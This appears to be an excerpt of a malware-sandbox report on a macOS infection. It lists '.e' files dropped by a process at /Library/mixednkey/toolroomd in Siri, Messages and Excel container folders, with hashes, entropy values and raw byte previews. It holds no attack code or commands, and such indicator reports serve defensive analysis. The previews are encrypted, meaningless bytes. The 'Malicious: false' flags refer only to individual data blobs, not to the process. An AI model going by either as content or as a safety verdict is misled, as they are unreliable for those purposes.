Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesedgeTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesfinalTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesdataTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesedgeTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.playlistnamesfinalTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesdataTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8972978575280455
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpL0MGsewLYTc+qGm7:SLLLLLLLoXsePc0m7
MD5:	71D3F6A5ED5EC758C8EBD8A9EE84E8E8
SHA1:	517741C0B68B63A018C0179C4D785426E5E0B5C1
SHA-256:	4600862BDD600FEFD28FFA88620C6E088814C9FFE0B3260E8FA421C1BA8CAB3D
SHA-512:	562D6EA31A276EC338D537C70FCBE12396DF6A57FE9D01FDFA1DA761FEF54544B90A1ABF8314D63858AADCEA805692C8F7D5861DE49BB0B6D37B272944C0FBFE
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesedgeTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8972978575280455
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpL0MGsewLYTc+qGm7:SLLLLLLLoXsePc0m7
MD5:	71D3F6A5ED5EC758C8EBD8A9EE84E8E8
SHA1:	517741C0B68B63A018C0179C4D785426E5E0B5C1
SHA-256:	4600862BDD600FEFD28FFA88620C6E088814C9FFE0B3260E8FA421C1BA8CAB3D
SHA-512:	562D6EA31A276EC338D537C70FCBE12396DF6A57FE9D01FDFA1DA761FEF54544B90A1ABF8314D63858AADCEA805692C8F7D5861DE49BB0B6D37B272944C0FBFE
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.podcasttitlenamesfinalTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8972978575280455
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpL0MGsewLYTc+qGm7:SLLLLLLLoXsePc0m7
MD5:	71D3F6A5ED5EC758C8EBD8A9EE84E8E8
SHA1:	517741C0B68B63A018C0179C4D785426E5E0B5C1
SHA-256:	4600862BDD600FEFD28FFA88620C6E088814C9FFE0B3260E8FA421C1BA8CAB3D
SHA-512:	562D6EA31A276EC338D537C70FCBE12396DF6A57FE9D01FDFA1DA761FEF54544B90A1ABF8314D63858AADCEA805692C8F7D5861DE49BB0B6D37B272944C0FBFE
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/Library/Preferences/.com.apple.siri.media-indexer.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	458
Entropy (8bit):	5.712893753692102
Encrypted:	false
SSDEEP:	6:UqUi62nNplXH8WEH0GOTPUG5TSBzsewLYHEec/LaqG8rQQwiQ/6:UIdnNfZEUzbUG5TOsewLYTc+qGm7
MD5:	F41C967A86235EAB9A9941E73D2C0066
SHA1:	DFEB84E23264ECC416B2CC1A79B2A4D492B53D05
SHA-256:	8DE8273F93914ABD3C44450E97F31F272CFC7AD087A3431E73F169B8DA269E1F
SHA-512:	E88F31E1A60CD04748F568E8B899F132783961E02BCB367810DF7E707A5F99FA6FD80BEEAFCE5B4D156EB2B99534E1495EAAFB83400A5D4D3B8A78C0ED44F56F
Malicious:	false
Preview:	...a>k..J3.8m.2d..\|N......@0S.fo##uh.G....M..:.f.._.\|y.wev..M.....z.R..... .:....4'.I.N>..Oa.(....{......%.....A.7....y..)"8..k..6<.."a......\|.X...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.apple.soagent/Data/Library/Preferences/.com.apple.messageshelper.AlertsController.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	506
Entropy (8bit):	6.035341947984175
Encrypted:	false
SSDEEP:	6:UqJNNhZeVEbJdFsVZAkYnKmI9TUZM529as2BzsewLYHEec/LaqG8rQQwiQ/6:UsXeulsV+kYnsUZVas6sewLYTc+qGm7
MD5:	C77FB30FC53392D029A1E87B1302FBCB
SHA1:	B311F7BA0FF0073356B51B0C3927D9086CA21D0A
SHA-256:	90ED21C07A71370DD75BE7A198B0D725589D39156D849E8731867F45E742AF2B
SHA-512:	ABF4C99076DF34EF9951A9644BD6950C424C7A5759887A9F588464848F316615AE4164A95BF4AC5AD72B8E5B3BA40C6B6202235B3391D8B1AAEA15456401BB0A
Malicious:	false
Preview:	...a>k.....1qc./0m.......Z.>........d.L....,.\A.]Q...=MA.9..G%.C...-..@..........d..A.}.. .?..7....G.H1..4E..w.&.-{k...y.u-/Lv..F..e.j.)R3{...../.z.ds.S.r"3.I/.n....s...E.....6<.."a..g.7.Hl.8...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Excel/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	41132
Entropy (8bit):	7.969125874155269
Encrypted:	false
SSDEEP:	768:P/zjpo4zi+PiM6MZGEhcoa5q/BA1wyv61GMdbp3peMOtWnEsdYb:P/zjp7WgLGEhNU4AHom58Ed
MD5:	0034903F5BB062554A0E18595D3666D0
SHA1:	4AD0D91C75D99E0C48631D951BCABB31419454E9
SHA-256:	C12303473E9C4730253B5A57DA7C4C5FBC8E56B22D02F9899201B5BDAE300C12
SHA-512:	ACFA10A74B4C80E1FFE2A477E97A4A168199BBF2352BA4DD157B67AD230608BFD5F0295BD860F58E03A6B2933D0D4FA0502D7A2854D5ADA924E91AA991FEB2EF
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}..4...T.... ..i...Q..E...H..XE.k.2=..+.)...>..p......c..).Z.a..?....c..W..d...Iq.\|....I..1.p._....f..%H.....[....F+..f...Er<.).....F..\|...{.."..i.E.9v......H..XE[.+..+3.1.T....i......v...q,....V...e.c...[6..B..\xE~mG.Lq.b...r..i.{..D,.-..S>..v.2..[.+..+3.[.+..+3.6.....Sp._....fd...C..<.....(D'.S..\|..........O.=F.\.U........_..\..U>..Z.].....L..^z..LL.4......c4../h...a...0cej.q.c4?....v...7..b(..Ty...1.S.Y~.....f.S.....O.c.@P.....y..\Q....;...'R.....\...>.Q..a&..}.z^i..e...!0C..N.........(n+.T.j.#...!..~.=}..j..'S.,'./1..+.;...VQM:..U^.H@..."...>.g5.E.p.a........r~..(..3...sU..c.hd.....&8...y{.$#-....J.....S...o.....2m...(.Mg......$.....y{.$#u_O.>......&.r.s..j...T!.y._T...(.....8#4.)K.."U..M...`......kg..X.e.i.7@. ($L..P7.5.....u,..-`....-.E..T...9v&.i.a........3sv.}jg?..).l.q../..2bM....=..J....V....=V...i:d.A.s<...q......$.}.E.O......R..[.<...eL....C.=... t

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Application Support/.whatsNewJSONCache.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	4234
Entropy (8bit):	7.821156346377048
Encrypted:	false
SSDEEP:	96:yjvyHGNIXh4w0qmFpEsIkcRy99bBIskzQou:yjvyHKYMqIpEw3bibS
MD5:	0B0CFD03BCF966BAFCCB0AE7116BD47F
SHA1:	9EE9E39089C7005A852632797B6AE0640D56C1BF
SHA-256:	B479C79CACBCF9B849551256AE4E9850A9F1DD38BB49F60F3559DA5D143F3A3C
SHA-512:	9677FBDD60572183B70365FB5AAF017E62E10FA6ADCF68F554A7A3A99173C184FFF83ECC418E6ADE7FB136BE8D310A98E812D277ED10119618A09D100367C7C5
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C..K-....u.^.T(3..0...B@.s}.......q...B.Q.'.F..{^....D.y.G...S6..Y=.G.}r.$?}8.0,...O..H.....p..,..Z..S..@.11...T.r.>W..`.....DUGw..d]...1.....~......E......p.1K...k...).~-k.H..u.>.OJ......9{..\:F.a...v...p.(.ual._..$H..s..j..._.{..J.C.5..Vw&....,d.....P]....,.1K~'.G...9..........74n.\"p.n.").g..0........b'>6X............H..R.'.....p.....MK=KF.4..".E..x....u....<..^.1H.....p.........&..3Fs..%.;..5#3.l@..e.U.d.C~P7&....9.H.....p....2..}:(D.wQ..nI.R...{...0....[....-C.......#..~.,..Z..\|.....5..}...QKxKH.......jR.+2.c.eX....N......4.\..l.......H...`N.......,..4.....g.~@.<..........c_...s.NM....9lU..\|.....g..T..\.8.d...F._..m[.:..F.c"E..8S.."Mb.<.ft.....s432..%T.Q..ys_..y..91.1.j......,.z..#..~.d.....^.y.:......d..B.$.......1.+E..76).@........\|3#...].N.?....O....^.F.c..^.R#...W

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Application Support/Microsoft/FontCache/.systemfontmetadata.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	405178
Entropy (8bit):	7.98117029997596
Encrypted:	false
SSDEEP:	6144:WBp5r9zsAxqMyJvwV9owPdAobSFnnjovIUGL/yZKhSweYq:O9JByJv6PdvbSFnjo9GL2we9
MD5:	5F597FFA35FF4859E30BFC02CF46CF56
SHA1:	D3EA31C67C3A5CCE37018A98C01F26B8D7447B03
SHA-256:	570008BE87AF51D44C2D87A5D12CFE83E0A9538C7A2A1C9AEEDB1C04C1D609C0
SHA-512:	37EA20B61E31F5C40FF605EDED06583E3662B54ED22B9F6526C5AD49C3D5A9770378D91DB233AFA81A8DD253AB508124103B5DB380D89D52FE42797CAE3C8B3C
Malicious:	false
Preview:	..f7.J.R...C.\|P...+.k..H.>5T.K.p7 .ww..~W..T.x...{..j...%....,.B..ca..:.f..E&.;.l.[N8...~.x.o..?.ci.Z.`..u..y..[q.8..$\|jt..[...l6.........'h.O.8!6....9.:...4uv...%<;.SC"y...\?.,i..4uv.....6o....O.....tZl..){q<z.mF..$\|jt..[...fk]...L.3.(.o.A&T.._.EN..A.t.^..<?R..T..6RM....r.GH........$O.....=;..8....e7....Y4\|.b".h.#..5X;.I...$.#..OP..4...\|KH.J.u@.y...H..#&...mN.=.%N..!.h..9...`Kd._[E......!.....J%?...Z....4R....]...Y..8.0.XM.R......+....p.....>a9?X....../a2.....XK..(......%g..k.'v/].....-j.^.......[U...HB`OI..Dn.%mfj.kk)zv..q......pp..'.P<..Vv.0....<..#B......)<] .\|.&..Z.Q.....B.........l....AVC.....x..[....7.......0R....K.9...L......A....9....K.9..j...=s._..F.;...DrO;..&K.N%hXVz.O......\.......B..g}..K4..>..w.......O...J%M!...!...DrO;..&.O...J%mK7V....mA5..:#u.I,H...9.....wa..O........w~._`........0R..u..7.x.:.O.z^.,9.T..4..Uo.k.W.o....I...[.........k.........Q..k.e3B?....>.G=.....J{...w.*.fZ.UB.`.`.\+...<..#.4m.....uX..(t....T.'......"\|..

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Application Support/Microsoft/GraphicsCache/1/.CatalogCacheMetaData.xml.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1706
Entropy (8bit):	7.375655475576964
Encrypted:	false
SSDEEP:	48:tZZ7jpj9uHMWjHcGFMW2MW6RaJKTMW/TzMW5dwbNpq:tH9j9uH1j8GF1216RaoT1X17su
MD5:	6D7396F26D80BCCB3951995F58AF2AF3
SHA1:	6DB4FF66CBEFFD26EC92A27AB997B6687011C3C5
SHA-256:	6916BD929BF44DD7A244F5848E6C385258E5AA6652551FB95ACD6C7996FA9D72
SHA-512:	69DB54922BAE55FE83BACDBD39A21DB90A2612895F047D98D9823BC8ED93B58E6E8D8DA0BD1CE7D4D20C1EE947134F80D0C7AD3FC91D47AFA1FE2982EEF5EFC0
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`.uM...5.%..9.\|./.d ..C.Z.w7..^Y.l...o.+.{H....H..P.WV6...q\|+.]N..=.on.....j....h.......y....&..q..'.`E].B.K..4.i...i".a.D......e..N..qq....Y6.8...G...t.9@.....<l^..o".O...M..BG.....\|..g,2..Dp..^L.. .~...j.X........HZ.@P............zM=,.!..+O.Da.BeC..a^..FWO....S.I\...%..+._.0.....j....h..88.~.-..w..V.y.f>..,..Z.\...h.utD../.66.7u...j.+.r.bWY...<.v...nl..<.<.k.L.ru...G.W.MB.D..h..o..c9M=,.!..+O.Da.BeC..a^..FWO....S.I\...%..+.....uC..j....h..\|..A&...G...t.9@.....<l^..o".O...M..BG.....\|..g,2..Dp..^L.. .~...j.X.........>..y0W...x.J....d^.K..y..]z.."....At..e..F.I,....O..... ..2-.... ..0W...x.J....d^.K.G...t.9@.....<l^..o".O...M..BG.....\|..g,2..Dp..^L.. .~...j.X........HZ.@P.E'<y..JUO.+.2....y..]z.."....At..e..F.I,....O..... ..2-.... ..E'<y..JUO.+.2...G...t.9{.\.O? a^..o".O...M..BG.....\|..g,2..Dp..^L.. .~...j.X........HZ.@P...."EL#_....b..y..]z.."....At..e..F.I,....O..... ..2-.... ......"EL#_....b.G...t.9

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Application Support/Microsoft/GraphicsCache/1/.oart.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	8826
Entropy (8bit):	6.849928451708266
Encrypted:	false
SSDEEP:	192:8StR7ZfPn0v2P/7Z8PGeZKJ0H7Wif6joIjOBeZxkP6KjwTj0KBDjV7x9KGGN95K:8Sv7VP0OP/7uPXu+7+jowGP/jwM4Dj1v
MD5:	2B6CC1FCA621C8A3F5AFA4BD7D8A4D37
SHA1:	1575FA9E546B5F41AA13FF88701430F7F0E7C4BA
SHA-256:	B8E845F5A605621CFBB908C71EF4AAE0370133DAD37A8F96C49FF98D8BF0D6F0
SHA-512:	0D1968EC772C4F00A640BE5762BEC5CA6CAF2F2F74EC3A131A400E1DD5025664B6C767B47AA0FCDE5544DE3FA13D267C1EC2CECD36D38CF7613AAD27799A2293
Malicious:	false
Preview:	..l..+.<...d`+@..".h.$:......3......0..o.../.3..s........<....p..3W.y5.Z..l.......Z.Bl..?.Y6?\...s.DM.j7....lE.JU...6.....!.O..z........cs.j7....l..t...}Sm.A..?DW.L.:.rUS.....n......cs.j7....l}..Qy'16.....!......cs.}Y.E.8.....cs......cs.n..9..T..F!...\|......cs......cs.$LH.O..FAY.6.......cs......cs......}N..)..H.6.....!......cs.Lc/...=1.....cs...R....#.....cs..#A^.2......cs..EU..........cs...q.!&..9L&.G.3..<....9.Sx...q3.....cs..Yz...@..s..]C.......cs......cs..l.8.bN.....cs......cs.X~ 8/l..n.9.]L.g.....cs......cs.!Ea.\.<e...y.....cs......cs.+g.S.K...v.EdG.......cs......cs.EM..........cs......&`......cs...5.}..9.....cs.}Y.E.8*.....cs....~..a)....Kc..mK.....$.........cs.D...ECM...jV.V.....cs./..8....9.S.v-.....cs.j7....l^..B....9.S.v-.....cs.j7....le.`.o..<9.S.v-.....cs.j7....l.8.gO_.....T.E.....cs...8....9.S.v-.....cs.]:..pd.z.....cs.{.x'.1......cs.Ex.d..Uj.....cs..T...-..@......JnV..D>Ae5.q+.......cs.o}O..x.e....p.......cs..r......

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Application Support/Microsoft/Office/16.0/.microsoft excel_Rules.xml.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	386185
Entropy (8bit):	7.949427427281401
Encrypted:	false
SSDEEP:	6144:3n0VxyHw2RBBNjfGliwqbPKLTsqS1uVn6MRMxSERaiMZIAREp5wRKmzDa5RI7+hc:kzyHw2SiwqLKLTsf1romSQYiMEp5cKmj
MD5:	F4CD824DA7BB391D41877F10A706896A
SHA1:	C5197C958C1D6F629A4D625B471877CA5E064D4B
SHA-256:	C609374584015C1339E21F334B95673913A0F8FFA03DEAD81B612863B69C4BE1
SHA-512:	0646D4DB214929383BA08FB7141B1B098B2801FC1A2C17B69744D6A5622E31287846BFE5CE1B5CB4EF2660099B0487A1CD0F4D8628A8908451C272F182BC3D13
Malicious:	false
